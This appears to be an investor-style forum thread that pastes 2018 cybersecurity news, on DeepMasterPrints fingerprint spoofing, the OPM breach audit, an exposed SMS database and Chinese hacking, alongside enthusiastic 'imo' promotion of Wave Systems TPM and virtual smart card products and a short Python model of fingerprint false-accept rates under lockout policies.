The attack is designed to exploit systems that match only a portion of the fingerprint, like the readers used to control access to many smartphones.
The aim is to generate fingerprint-like images that match multiple identities to spoof one identity in a single attempt.
DeepMasterPrints are an improvement on the MasterPrints the researchers developed last year, which relied on modifying details from already captured fingerprint images used by a fingerprint scanner for matching purposes.
The previous method was able to mimic the images stored in the file, but couldn't create a realistic fingerprint image from scratch.
The researchers tested DeepMasterPrints against the NIST's ink-captured fingerprint dataset and another dataset captured from sensors.
"This work directly shows how to execute this exploit and is able to spoof 23 percent of the subjects in the dataset at a 0.1 percent false match rate. At a one percent false match rate, the generated DeepMasterPrints can spoof 77 percent of the subjects in the dataset," the researchers write.
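The reason partial-matching readers are exposed to this kind of "dictionary attack" is that every enrolled partial template and every allowed attempt is one more chance for a false match. The following added illustration (not code from the article or from the NYU paper) quantifies that with an idealized model in which each comparison is an independent trial with false match rate `fmr`; the independence assumption and the sample parameters are constructed for the example, and the figures it produces are model outputs, not the paper's measured 23 and 77 percent.

```python
"""Effective false-accept probability for partial-template fingerprint matching.

Model (an assumption for this illustration, not a claim about any real sensor):
each comparison of a probe against one enrolled template is an independent
Bernoulli trial that falsely matches with probability `fmr`. A reader that
stores several partial templates per finger and allows several unlock attempts
therefore performs templates * attempts such trials before locking out.
"""
import math


def effective_false_accept(fmr: float, templates: int, attempts: int) -> float:
    """Probability that at least one of `attempts` probes falsely matches at
    least one of `templates` enrolled partial templates."""
    if not 0.0 <= fmr <= 1.0:
        raise ValueError("fmr must be a probability in [0, 1]")
    if templates < 1 or attempts < 1:
        raise ValueError("need at least one template and one attempt")
    comparisons = templates * attempts
    # P(no false match in any comparison) = (1 - fmr) ** comparisons
    return 1.0 - (1.0 - fmr) ** comparisons


def max_attempts_for_budget(fmr: float, templates: int, budget: float) -> int:
    """Largest number of unlock attempts a lockout policy can allow while the
    effective false-accept probability stays at or below `budget`.
    Returns 0 when even a single attempt exceeds the budget."""
    if not 0.0 <= budget < 1.0:
        raise ValueError("budget must be a probability in [0, 1)")
    if templates < 1:
        raise ValueError("need at least one template")
    if fmr <= 0.0:
        raise ValueError("fmr must be positive for a finite answer")
    # Solve 1 - (1 - fmr) ** (templates * a) <= budget for the largest integer a.
    # Both logs are negative, so the ratio is the number of comparisons allowed.
    comparisons_allowed = math.log(1.0 - budget) / math.log(1.0 - fmr)
    return int(math.floor(comparisons_allowed / templates))


def compare_policies(fmr: float = 0.001) -> dict:
    """Constructed scenarios showing how stored partial templates and
    permitted attempts multiply the per-comparison false match rate."""
    scenarios = {
        "full print, 1 template, 1 attempt": (1, 1),
        "partial print, 10 templates, 1 attempt": (10, 1),
        "partial print, 10 templates, 5 attempts": (10, 5),
    }
    return {
        name: round(effective_false_accept(fmr, t, a), 4)
        for name, (t, a) in scenarios.items()
    }


if __name__ == "__main__":
    for name, p in compare_policies().items():
        print(f"{name:45s} effective false accept = {p:.2%}")
    print("attempts allowed at 1% budget with 10 templates:",
          max_attempts_for_budget(0.001, 10, 0.01))
```

The practical takeaway for a defender is that the reader's advertised false match rate is per comparison; the number of stored partial templates and the attempt limit before lockout decide what an attacker with a set of synthetic prints actually faces.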
=================================================================
A-Ha, the better security of a PIN number and the TPM of Wave VSC 2.0 at less than half the cost!! These articles show the potential limitations of biometrics and why imo Wave VSC 2.0 should be at the top of many companies' shopping lists.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
Excerpt:
The user experience with a virtual smart card is simple: he or she logs in with a PIN (authentication factor number one). The TPM (authentication factor number two) then transparently identifies the device to the network and connects the user to all the approved services. It’s one less thing for users to carry around.
OPM is Still Far Behind on Data Protection Three Years After Devastating Breach
https://www.nextgov.com/cybersecurity/2018/11/opm-still-far-behind-data-protection-three-years-after-devastating-breach/152804/
The agency hasn’t implemented one-third of an auditor’s cybersecurity recommendations.
More than three years after suffering the most devastating cyber breach to date against civilian government networks, the Office of Personnel Management still hasn’t implemented about one-third of the recommendations from the government’s in-house auditor, a Tuesday report found.
Un-implemented recommendations include regularly updating software to the latest version, encrypting passwords and ensuring administrators aren’t sharing account logins, according to the Government Accountability Office report.
In some cases, OPM still hasn’t reset passwords that were used before the breach, the report found.
The OPM breach compromised sensitive security clearance information about more than 20 million current and former federal employees and their families plus a smaller amount of fingerprint data.
Overall, OPM has implemented 51 of the Accountability Office’s 80 recommendations, or about 64 percent. Some of those implemented recommendations include strengthening firewalls, enforcing password policies and updating contingency plans for the especially vital system, the report states.
Of the 29 remaining recommendations, OPM plans to implement 25 before the end of 2018 plus three more before October 2019, the agency’s chief information officer told the Accountability Office.
OPM does not plan to implement a final recommendation focused on putting security controls on contractors’ workstations, the report states. The office believes it has other security controls that compensate for that one, GAO said.
The GAO report comes just days after OPM’s own inspector general found “material weakness” in the agency’s information security program, citing a lack of information technology resources and “the agency’s culture of minimizing the role of the chief information officer.”
The inspector general also noted a “significant deficiency” in OPM’s IT security controls, noting that all the agency’s IT systems had valid security assessments and authorizations but some of those assessments and authorizations included low-quality work and questionable supporting documentation.
A federal appeals court is currently considering whether to reinstate a lawsuit brought by two federal employee unions over OPM’s data breach. That suit was scrapped at the federal district court level when a judge ruled the plaintiffs didn’t have standing to sue because they hadn’t suffered any clear harm.
Chinese government-linked hackers are widely believed responsible for the 2015 OPM breach but U.S. officials have never formally accused the Chinese government of being responsible for the breach. There’s no clear evidence that data stolen in the breach has ever been released on the dark web or used to conduct identity theft.
=================================================================
OPM could be a very happy customer for using Wave VSC 2.0. The product is better security at less than half the cost!! Other agencies within the government could be very happy customers too!
Someone like Bill Solms would need to present the product once again to the government because it seems to be sorely missing from a protection standpoint. imo. The reason I mention Bill Solms or someone like him is due to his government expertise and the article at the end of this post.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Token-free, password-free user authentication
We know you’ve dreamt about shredding your list of passwords. Go on and do it.
Because you are starting the authentication process in the device’s hardware, the user doesn’t have to interact with it. All users see is their usual Windows log-in screen – no more additional passwords to access the VPN or other resources. They just sign in once, and the secure credentials in their TPMs securely and quickly connect them to everything they need. Say goodbye to user frustration and slow OS performance.
==================================================================
Wave Systems Announces First U.S. Federal Government Customer for Wave Virtual Smart Card 2.0
https://www.wavesys.com/buzz/pr/wave-systems-announces-first-us-federal-government-customer-wave-virtual-smart-card-2.0
Lee, MA - October 2, 2014 -
Wave Systems Corp. (NASDAQ: WAVX) marked an important sales milestone by announcing the first U.S. federal government customer for its Virtual Smart Card 2.0.
Since the Virtual Smart Card 2.0 became commercially available in late July 2014, Wave has entered into dozens of pilot deployments in multiple sectors, including healthcare, financial services, automotive, energy and utilities. However, today’s announcement marks the product’s first sale in the government sector.
“This is an important milestone for Wave,” said Bill Solms, CEO of Wave. “Wave Virtual Smart Card 2.0 has been purchased by a government agency with significant security requirements and one that requires redundant means of system authentication due to national security interests. This initial sale is modest compared to the addressable market within the Federal Government sector, but it is important to our strategy for marketing the Virtual Smart Card to address critical government infrastructure defense.”
“We believe that this sale, which was completed on a shorter sales cycle than we had anticipated, supports our view that customers are interested in the type of cyber security solution that Wave’s Virtual Smart Card 2.0 provides,” Solms added.
Wave Virtual Smart Card 2.0 is the industry’s only enterprise-grade virtual smart card management solution that works on Windows 7. It also supports Windows 8 and 8.1. Wave’s new solution emulates the functionality of physical smart cards or tokens, but offers greater convenience to users, lower total cost of ownership, and a reduced risk of unauthorized use.
Wave Virtual Smart Card 2.0 gives IT the ability to:
• Remotely create and delete virtual smart cards
• Provide help desk-assisted recovery
• Configure PIN and card policies
• View the status of virtual smart cards and enrolled certificates
• Generate reports for compliance
• Support virtual smart cards on laptops, tablets and desktops with TPM 1.2 or TPM 2.0
=================================================================
26M Texts Exposed in Poorly Secured Vovox Database
https://www.darkreading.com/cloud/26m-texts-exposed-in-poorly-secured-vovox-database/d/d-id/1333292?_mc=KJH-Twitter-2018-11
The server, which lacked password protection, contained tens of millions of SMS messages, two-factor codes, shipping alerts, and other user data.
A poorly secured database exposed at least 26 million text messages, password reset links and codes, two-factor verification codes, temporary passwords, shipping alerts, and other information belonging to customers of companies including Microsoft, Amazon, and Google.
The leaky database, owned by communications firm Vovox, was found on Shodan by Sébastien Kaul, a security researcher based in Berlin. Kaul discovered the database lacked password protection and left names, phone numbers, and text messages easily searchable. Vovox took down the database after it was contacted with an inquiry from TechCrunch.
However, while the server was still running, anyone could have obtained two-factor codes sent by people attempting account logins. This level of accessibility could have let someone easily take over an account protected with two-factor authentication and an SMS verification code.
While the codes and links exposed are only useful for a finite period of time, there is a risk that attackers were able to compromise users. Security experts have long been wary of SMS verification, saying it's insufficient to properly protect users' data – a lesson learned in the August Reddit breach, which engineers said was rooted in SMS-based two-factor authentication.
=================================================================
Better security by using Wave VSC 2.0 rather than SMS-based 2FA.
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
White paper has section on SMS:
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
How the U.S. might respond if China launched a full-scale cyberattack
https://www.cyberscoop.com/u-s-respond-china-launched-full-scale-cyber-attack/
The U.S. financial and energy sectors are no strangers to foreign government hackers, from Iranian denial-of-service attacks on American banks to Russian reconnaissance of industrial control systems. Less-familiar territory, however, is how companies would work with the U.S. government to respond to a cross-sector cyberattack during a geopolitical crisis.
About 20 private-sector executives and former government officials gathered last month in Washington, D.C., to take a stab at that question.
A tabletop exercise hosted by the Foundation for Defense of Democracies (FDD), a think tank, hashed out what companies and federal agencies might ask of each other in the 72 hours after a disruptive series of computer intrusions.
The fictional scenario involved a confrontation between the United States and China in the Taiwan Strait, which was followed by a cascading cyberattack on multiple U.S. critical infrastructure sectors. The former defense and law enforcement officials in the room discussed with their private-sector counterparts — executives from the banking, electricity, and retail sectors — how a U.S. government and industry response to the cyberattack might play out.
Participants debated everything from the government’s use of private data to attribute cyberattacks to the potential blowback of offensive U.S. operations.
“The private sector is on the front lines of this new battle space,” the FDD’s Samantha Ravich said, describing the impetus for the exercise. “It’s not [private companies’] business to do national security. Unfortunately, national security is being done to them now with cyber-enabled economic warfare.”
U.S. officials have acknowledged that cyberspace is intrinsic to geopolitical conflict. The FDD drill was a recognition that, in order to succeed in such a conflict, the government and private sector need to be in lockstep.
Companies need to be “a lot more involved [and] informed to protect their interests, and know what the government can do for them and what it can’t,” Ravich, a former national security adviser to Vice President Dick Cheney, told CyberScoop.
Participants in the exercise considered how U.S. government attribution of cyberattacks can help companies defend their networks. There was “a good, robust discussion” on the value of spending limited company resources on helping the government trace the origin of an attack, Ravich said. Knowing which foreign government is behind an intrusion can help a company prepare for future activity, she added.
“There were certain categories of authorities that the folks [formerly] in U.S. government brought up that the private sector really wasn’t aware of,” Ravich added. “Why should they? They’re running businesses; they can’t cite chapter and verse of some authority.”
Dire Straits
The FDD drill explored what might happen if China’s actions in cyberspace escalated, said retired Gen. Michael Hayden, who attended the exercise. Over the course of the exercise, executives feared the private sector would bear the brunt of escalation and cautioned against retaliatory U.S. government measures against China, Hayden told CyberScoop.
“I’m the one who did the intervention and [said], ‘Look, you got the Chinese kicking ass in the digital domain … and you are telling me you want us not to respond?” recalled Hayden, a former director of the National Security Agency. “I said, ‘There is nobody in the NSC [National Security Council] meeting who is not going to vote to respond to the Chinese.’”
For Hayden, a principal at The Chertoff Group consultancy, the drill showed that “there really is daylight” between the government and private-sector perspective on retaliating in cyberspace.
For others in the room, too, real-world events echoed what they saw in the tabletop exercise.
The same month as the exercise, cybersecurity company ESET published research showing how hackers have targeted energy companies in Poland and Ukraine, a campaign that aligns with Russian geopolitical interests.
News of that hacking campaign resonated with Bill Nelson, CEO of the Financial Services Information Sharing and Analysis Center, who also attended the FDD exercise.
“That tells me that we are doing the right thing exercising and actually going through the motions to [rehearse] this because it could happen and it is happening,” Nelson told CyberScoop.
The FDD exercise comes as U.S. officials continue to blame the Chinese government for using cyber and traditional espionage to steal U.S. trade secrets. Earlier this month, Department of Justice officials announced a strategy to combat “rapidly increasing” Chinese economic espionage.
=================================================================
China and the U.S. are currently 2 countries missing from the Paris Call in the previous post. After reading this article it sounds like more defensive preparation is needed and/or a new way of looking at it is needed. Wave's ERAS and Wave VSC 2.0 could offer the U.S. government and companies a way of being able to effectively defend against a full-scale cyberattack from China. Wave Endpoint Monitor could also help in the defense as well. imo.
==================================================================
https://www.wavesys.com/
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
U.S. tech giants back French call for global cooperation in cyberspace
https://www.cyberscoop.com/paris-call-for-trust-cybersecurity-framework/?utm_campaign=CyberScoop%20-%20Editorial&utm_content=79751257&utm_medium=social&utm_source=twitter
Excerpt:
The Paris Call also focuses on private-sector responsibilities in cyberdefense, highlighting the power vested in tech companies and their responsibility to build strong security into their products.
================================================================
French president Macron insists new regulations needed to protect us from Facebook
https://www.theregister.co.uk/2018/11/12/macron_internet_regulation/
Excerpt:
He also pushed a new set of principles that the French government has led termed the "Paris Call for Trust and Security in Cyberspace" which describes itself as a "high-level declaration on developing common principles for securing cyberspace."
================================================================
More than 50 nations, but not U.S., sign onto cybersecurity pact
https://www.axios.com/cybersecurity-paris-call-for-trust-france-21e434df-8a59-48bc-8cde-cd1c1f43dfd0.html
But the signatories include two notable tech sector security agreements: the Microsoft-led Cybersecurity Tech Accord and the Siemens-led Charter of Trust.
•Major tech firms like Microsoft, Facebook, Google, IBM and HP are all signed on — either through those private sector pacts or to the agreement outright.
================================================================
-highlighted TCG members
At USAA, cybersecurity is a ‘24/7 problem’
https://www.expressnews.com/business/technology/article/At-USAA-cybersecurity-is-a-24-7-problem-13376369.php
Amid a raging cyber war, USAA’s cybersecurity experts must be on the defense at all times.
At the Cyber Threat Operations Center, located inside the bank’s headquarters in San Antonio, they are always monitoring attempts by cybercriminals to gain access. Teams focus on detecting threats, analyzing them, looking for vulnerabilities and reverse engineering malicious software. There’s someone on shift around the clock.
An electronic map on a wall in the center lights up with yellow arcs showing the millions of attacks against the firm on a daily basis. They come in from all over the world.
On a recent weekday, there were more than 12 million in a 24-hour period. Gary McAlum, chief security officer at USAA, said he’s seen that figure get up to 20 million.
“We look at security as a 24/7 problem,” he said. “The problem of cybersecurity never gets solved. It just changes and morphs continuously.”
Financial institutions have always been appealing targets for thieves, but the frequency and sophistication of cyberattacks has contributed to a sense of urgency. Hackers have unlimited time and resources, McAlum said. At USAA, “we live in a state of what I call healthy paranoia,” he added.
Along with financial implications, breaches can tarnish a company’s brand.
The average cost of cybercrime in the financial services sector was $18.28 million last year, according to a study by Accenture and Ponemon Institute. It was the highest figure among the 15 industries the groups looked at.
In a 2017 report, the U.S. Department of the Treasury listed cyberattacks as one of the main threats to the industry. “Financial firms are connected through complex, interconnected networks,” the authors wrote. “Disruptions to the operations of a key institution in the financial system could be transmitted through these networks and lead to a systemic crisis.”
Financial firms are getting better at preventing attacks, another report by Accenture found. They surveyed more than 800 security professionals from the financial services sector and found that companies stopped 81 percent of breaches between Feb. 1, 2017, and Jan. 31, 2018, compared with 66 percent for the 12 months prior to that time period.
However, more than 40 percent of breaches on average went unnoticed for over a week, they found.
“Financial services firms are converging to a level of mastery when it comes to the security status quo, including their cyber resilience and response readiness,” Chris Thompson, global security and resilience lead for financial services at Accenture Security, said in a news release. “But as business technology evolves, so too must cybersecurity. The new technologies that banks and insurers are embracing — including cloud, microservices, application programming interfaces, edge computing and blockchain — will create new security risks, especially as cyberattacks evolve in sophistication.”
USAA had a net worth of $30.6 billion and more than 12 million members last year, according to its annual Report to Members. The firm has the dual responsibility of protecting its enterprise, which includes employees, servers, mobile devices, computers, data and the supply chain, as well as its members and their digital interactions, McAlum said.
“You have to respect the threat because they have unlimited resources and every advantage,” he said. “If you ever think you're better than the threat, you get complacent and careless.”
The organization and other financial institutions see an assortment of attacks, from large-scale bot attacks to phishing sites to different kinds of malware, said Joe Arthur, USAA’s executive director of information security engineering and cyber operations. The firm does penetration testing, both standard tests and unannounced ones to see how employees respond to simulated attacks, and provides training for employees.
One of the six teams he leads focuses on threats that didn’t manage to get in, looking at who might be targeting the organization and how they can detect them.
“How do we understand the latest tactics and techniques that are out there that are used by attackers, and then how well-positioned are we to defend against that sort of attack?” Arthur said.
The biggest challenge on the consumer end is authentication, McAlum said.
The main way to verify someone’s identity currently is through knowledge-based authentication: People have to enter a user ID and a password and possibly answer a few security questions.
==================================================================
When I see articles like this and the immensely positive impact Wave could have on USAA and others, and USAA is only an hour and a half away, one conversation with the right person could have Win-Win benefits to USAA and Wave! And USAA isn't the only financial services company running its cybersecurity this way.
==================================================================
Some important links for those interested in Wave:
https://www.wavesys.com/products/wave-virtual-smart-card
The white paper:
https://www.wavesys.com/virtual-smart-card-2.0-from-wave
https://www.wavesys.com/buzz/pr/wave-announces-5-year-master-license-agreement-virtual-smart-card-20-leading-global
Wave Announces 5-Year Master License Agreement for Virtual Smart Card 2.0 with Leading Global Financial Services Company
Wins competitive evaluation against market leader in two-factor authentication tokens
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Enterprises Sinking Under 100+ Critical Flaws Per Day
https://www.infosecurity-magazine.com/news/enterprise-sinking-100-critical
Enterprises are forced to deal with an estimated 100+ critical vulnerabilities each day, with Flash and Microsoft Office accounting for the majority of top app flaws, according to new research from Tenable.
The security vendor analyzed anonymized data from 900,000 vulnerability assessments across 2100 enterprises to compile its latest Vulnerability Intelligence Report.
It predicted that the industry is set to disclose 19,000 new vulnerabilities this year, up 27% from last year — although other estimates put the 2017 figure at nearly 20,000.
Other stats from the Tenable report highlighted the increasing challenge facing system administrators tasked with prioritizing patches.
It claimed that, on average, an enterprise finds 870 vulnerabilities per day across 960 assets, with 61% listed as high severity. Yet just 7% have public exploits available, making it difficult to know which of the remaining 93% to fix first, the firm argued.
That’s especially true when one considers that many hackers deliberately target older vulnerabilities that may have been forgotten about.
Out of the 20 application vulnerabilities affecting the largest number of enterprises, several came from 2015.
Half of that top 20 related to Adobe Flash bugs, followed by Microsoft Office at 20%, with the eight top web browser CVEs from Google and Microsoft impacting 20-30% of enterprises on a single day.
“When everything is urgent, triage fails. As an industry, we need to realize that effective reduction in cyber risk starts with effective prioritization of issues,” said Tom Parsons, senior director of product management, Tenable.
“To keep up with the current volume and velocity of new vulnerabilities, organizations need actionable insight into where their greatest exposures lie; otherwise, remediation is no more than a guessing game. This means organizations need to focus on vulnerabilities that are being actively exploited by threat actors rather than those that could only theoretically be used.”
=================================================================
It seems that Wave Endpoint Monitor could play an important role in protecting the device while these vulnerabilities are being fixed. It should be a great product for organizations to have in their cybersecurity arsenal. imo.
=================================================================
https://www.wavesys.com/malware-protection
Excerpt:
Wave’s solution: start with the device
If antivirus software doesn’t work, what does? The Wave alternative relies not on superficial layers of software but on standards-based hardware: self-encrypting drives (SEDs) and Trusted Platform Modules (TPMs), or security chips, that are already embedded in many of your computers and mobile devices. This hardware provides you with secure storage. When you turn the SED and TPM on and manage them with Wave, you suddenly have a broad, deep view into your network. Among other things, you’ll know immediately whether any one of your devices—computers, laptops, tablets, smartphones—has been tampered with. But Wave is proactive too: you can block the kinds of behaviors that invite malware in. Wave's Endpoint Monitor provides early detection for these low-lying sneaky attacks.
=================================================================
https://www.wavesys.com/products/wave-endpoint-monitor
Excerpts:
Detect attacks before it’s too late
Malware can do its work for weeks or months before you ever know it’s there. But with Wave Endpoint Monitor, you can spot malware before it has a chance to cause damage.
Antivirus software can’t detect rootkits and other malware; it works at the level of the OS and isn’t very good at seeing deeper into the system. For example, it can’t tell whether the boot record is lying. The Wave alternative is to work with the Trusted Platform Modules (TPMs), or security chips, embedded in your devices. By using the TPM to attest to the security of the device each time that device boots, Wave looks below the operating system and can help detect threats lurking there. Every time a device boots up, Wave Endpoint Monitor makes a comparison against previous boot values, and if anything deviates from the norm, it alerts you immediately.
Key Features:
Easy security compliance
• Comports with NIST guidelines for BIOS integrity
Data protection
• Ensures that you can trust the integrity of your measurements for central analysis
• Real-time alerts for zero-day detection of APTs
• Get Windows 8 Malware protection now—WEM covers previous versions of Windows
Simplicity
• Uses standards-based security that’s in every PC you own
• Measurement notifications and reports can be customized for your processes and work flows
• Centralized, remote activation and management of your TPMs
• E-discover which PCs in your organization are enabled for endpoint monitoring
No compromises
• Ensure host integrity—without expensive hardware or excessive administrative overhead
Guess who's back, back again? China's back, hacking your friends: Beijing targets American biz amid tech tariff tiff
https://www.theregister.co.uk/2018/11/09/china_hacking_usa/
Every little thing Xi does is magic, everything Xi do just turns me intrusion alarms on
Three years after the governments of America and China agreed not to hack corporations in each other's countries, experts say Beijing is now back to its old ways.
And if that's the case, we can well imagine Uncle Sam having a pop back.
Speaking at the Aspen Cyber Summit in San Francisco on Thursday, a panel including top NSA adviser Rob Joyce and Symantec CEO Greg Clark said the 2015 truce the Obama administration struck with Beijing has been all but wiped out over the past year. The Middle Kingdom has now returned to spying on American businesses, stealing secrets and gathering intelligence with a new zeal.
"It had a marked impact on the way that the Chinese were behaving," former White House security czar Joyce said of the Obama-Xi agreement. "We have certainly seen the behavior erode in the last year, and we are very concerned with those troubling trends."
The rise in activity comes amid the escalating trade war between the US and China, with each side raising tariffs on imports.
Post hoc ergo propter hoc
However, correlation does not necessarily mean causation. Dmitri Alperovitch, cofounder and CTO of CrowdStrike, noted that events within China, most notably a series of government reforms and anti-corruption campaigns, played a significant part in limiting activity against the US in past years as Beijing-backed hackers focused their activities within the country, spying on undesirables, rather than against foreign targets.
"We were tracking those Chinese threat actors," Alperovitch said. "They didn't cease to exist, but they were just hacking Chinese companies."
Regardless of the cause, the panelists agreed that China is now back with a vengeance.
Clark said that things have got so bad that one of his clients has given up entirely on its latest generation of products, believing the blueprints to have been completely and comprehensively snatched by Chinese hackers.
"I had a very large corporate manufacturer come into our office and say 'we have stopped trying to protect it, it has all been stolen, we want to innovate faster'," the Symantec boss said.
Where the panelists differ is on what to do about the renewed hacking efforts from the world's most populous nation. For Joyce, the US government and the information security community at large can help by making life more difficult for President Xi's hackers themselves.
"Overall, it is about making it harder for them to succeed, and some of that will be taking away the infrastructure they're using, some of that will be exposing their tools," Joyce said. "There are a number of strategies you can come up with that make it less effective, less efficient, and less likely to be successful."
The solution: more war
Alperovitch argued that further economic sanctions will go a long way toward sending a message to Beijing.
"It is not a cyber problem, it is an economic warfare problem," he said. "Responding with economic actions of our own and putting pressure on China is the right strategy."
There is also hope that China's own internal development will alleviate the problem. Panelist Elsa Kania, adjunct fellow at the Center for a New American Security, believes that as Chinese companies further move into the international market, coming up with their own innovative ideas and concepts will take precedence over stealing intellectual property from rivals.
"There is clearly an ambition to graduate beyond IP theft and become more of a leader," Kania said. "There may be a broader transformation going forward." ®
=================================================================
Companies could start anew by using cybersecurity products that work effectively!! These products could be a game changer for companies in stopping the Chinese. Wave's products are mostly different from a lot of cybersecurity companies' products, and different because they work effectively! The links for these important products are provided below:
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/wave-self-encrypting-drive-management
https://www.wavesys.com/products/wave-endpoint-monitor
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
The link for Wave's site is: https://www.wavesys.com/
Apple Modernizes Its Hardware Security with T2
https://threatpost.com/apple-modernizes-its-hardware-security-with-t2/138904/
Apple has widened the range of Macs running its T2 security chip. Is macOS finally catching up with other platforms when it comes to secure computing?
When Apple launched its latest MacBook Air last month, one of its more unusual features is that the built-in microphone automatically turns off when the lid is closed.
Apple introduced the feature to eliminate any possibility of malware – or other unwanted applications – using the laptop’s microphone to eavesdrop on users.
The mic shut-off function is written into Mac systems via the security-focused T2 chip, and it’s just the latest use for the T2, which is a powerful piece of security technology that acts as the hardware root of trust for the Mac ecosystem.
The feature made headlines, even though the risk of anyone using a MacBook Air to bug conversations might seem low. But the bigger story is that with the expansion to the Air and other devices in its portfolio, Apple seems to be taking hardware security seriously. And researchers say Macs may finally be catching up to other computing platforms on that score.
Inside the T2
Apple first introduced the T2 with the iMac Pro in late 2017, then added it to MacBook Pro computers earlier this year – and most recently, it’s been implemented into the new MacBook Air and Mac Mini.
Apple’s first-generation security chip, the 32-bit T1, was introduced with the 2016 MacBook Pro line, again to drive the Touch ID system. Apple upgraded the T2 to a 64-bit chip, based on a single-core version of its A10 iPhone processor, to handle a much wider range of tasks.
The T2’s functions are indeed wide-ranging: It acts as an audio and mic controller, and controls the computers’ FaceTime cameras and even cooling systems. Vitally, it also governs storage security, and on top of that, it acts as a system-management chip. For instance, on the MacBook Pro, T2 controls the Touch ID on the TouchBar, and stores the biometric data in an on-board Secure Enclave co-processor.
With this more powerful chip, Apple appears to be setting out to add some heavyweight security features to the Mac. For instance, on T2-equipped Macs, the chip controls the boot process, and checks that the operating system is correctly signed. If it is, the machine moves on to the next part of the boot cycle. The T2 will validate current versions of MacOS and also Windows 10 – although at present, the chip will not allow a Mac to boot Linux.
The T2’s secure-boot facility is built to ensure that Mac owners don’t fall victim to modified system software or malicious updates. And, because T2 controls the Mac’s identity, it will work with mobile device management (MDM) technology to make it easier to administer secure boot for large numbers of MacBooks. This is a potential big benefit to enterprises – and to education in particular, where issuing laptops to students is increasingly common.
Unlike on the iPhone and iPad, Mac users do have a degree of control over their machine’s security settings. To that end, Apple provides an application called the Startup Security Utility, to control some of the T2’s behavior. Users can, for example, opt for “medium” security in order to use older versions of MacOS, or they turn the OS verification off altogether. This lets newer Macs boot in the same way as older models, without the T2’s intervention, although this is apparently not enough to fix the Linux issue.
Apple’s Storage Security
Aside from secure boot, the T2 has another core security function, one which could be even more important to data protection-minded computer users.
“The new T2 chip also provides a built-in hardware encryption engine that encrypts all of the data stored on the solid-state drive (SSD) with a unique security key on each Mac,” explained James Plouffe, strategic technologist at MobileIron, a mobile security specialist. “This means that all of the data on a Mac can only be read by that Mac, even if the SSD is removed. This adds another layer of security for enterprise data.”
Data encryption is not new to the Mac platform, it should be said: Apple has offered various flavors of its FileVault technology for several years. The advantage of the T2 chip comes from its dual function as a storage controller as well as an identity and encryption manager.
The T2 chip encrypts and decrypts data on the fly with, Apple says, no loss in performance. The encryption uses the AES-256 standard, which is the same used on iOS devices. The T2 sits between Apple’s NVMe storage chips and the Intel processor, and makes use of the native encryption functions in the Apple File System (APFS). This combination makes permanent, entire disk encryption realistic, according to Derrick Donnelly, chief scientist at BlackBag Technologies, an IT forensics firm.
“Encryption is on by default even if the user has not turned on FileVault; Apple is using encryption at rest,” said Donnelly. “Apple is using a new raw memory drive, with a new interface and no PCIe controller, and it talks directly to the T2 chip.”
The T2 also has one more trick to play. Apple’s technology combines a unique identifier from the T2 chip with the Mac owner’s password, and uses this as the basis for the storage encryption keys.
In simple terms, this prevents anyone from accessing the content of the NVMe storage chips, unless they have the user’s credentials and access to the Mac’s original T2 chip.
As long as users turn FileVault on, this makes it extremely unlikely that anyone could access the data in storage files by attempting to hack into the physical storage components, according to researchers at Duo, a security vendor now owned by Cisco.
Apple Security in the Wider World
Apple of course is not alone in bringing hardware security to its devices, and in some ways, it’s playing catch up both with the Windows PC market, and with its own iOS devices. Trusted Platform Modules (TPMs), support for two-factor authentication and Intel’s vPro chipset – offered widely in business-oriented laptops – already do much of what Apple is setting out to do with T2.
So is Apple up to snuff now? While the T2 may also introduce potential downsides (BlackBag Technologies’ Donnelly cautions that upgrade options, data recovery and even law enforcement access to data could become more difficult as Apple moves its systems to T2), Apple’s hardware-based encryption is scoring high marks with researchers.
“By taking their proven success and leadership on the iOS platform with respect to security and privacy, Apple has been able to fast-track catching up with competing platforms that already implement modern hardware security features,” says Pepijn Bruienne at Duo.
In all, T2 technology could be a significant step forward for anyone who needs a secure computing platform. Just remember to keep that lid closed.
=================================================================
Apple's T2 seems like a real endorsement for the TPM! There are already 150+ companies supporting the standard (TCG). With at least a billion TPMs in computers, not using the technology would be almost ludicrous when there is daily news of hacks and breaches!
=================================================================
https://www.wavesys.com/products/wave-virtual-smart-card
https://www.wavesys.com/products/embassy%C2%AE-remote-administration-server-tpm-management
Secure device & user authentication
Sometimes it feels like security is more effective at deterring your users than hackers. But you still have to protect your enterprise resources, and we’re here to help. We take pride in securing your network, data, and resources to an unprecedented level, without causing a revolt from either IT or your users. In fact, your users probably won’t even know we’re there.
Here’s how it works:
Trusted Platform Module (TPM) + Wave’s ERAS for TPM Management = hardware-secured, fully-managed authentication
Most of your devices already come with TPMs (check out our “What is a TPM?” brochure if you’re not sure why this is exciting). This security chip comes attached to the motherboard of most enterprise-class PCs. There’s nothing “add-on” about it. The TPM provides a verifiable, unique identity for each machine.
Wave’s ERAS for TPM Management gives IT remote, centralized management of all TPMs on enterprise computers and tablets.
With this control, IT can set policies and dictate which machines and users have authority to access which resources. IT can ensure that only known and approved devices are accessing your network. And what’s more, IT can prove it with detailed activity logs.
Microsoft President: Governments Must Cooperate on Cybersecurity
https://www.darkreading.com/vulnerabilities---threats/microsoft-president-governments-must-cooperate-on-cybersecurity/d/d-id/1333231?_mc=sm_iwfs_editor_kellysheridan
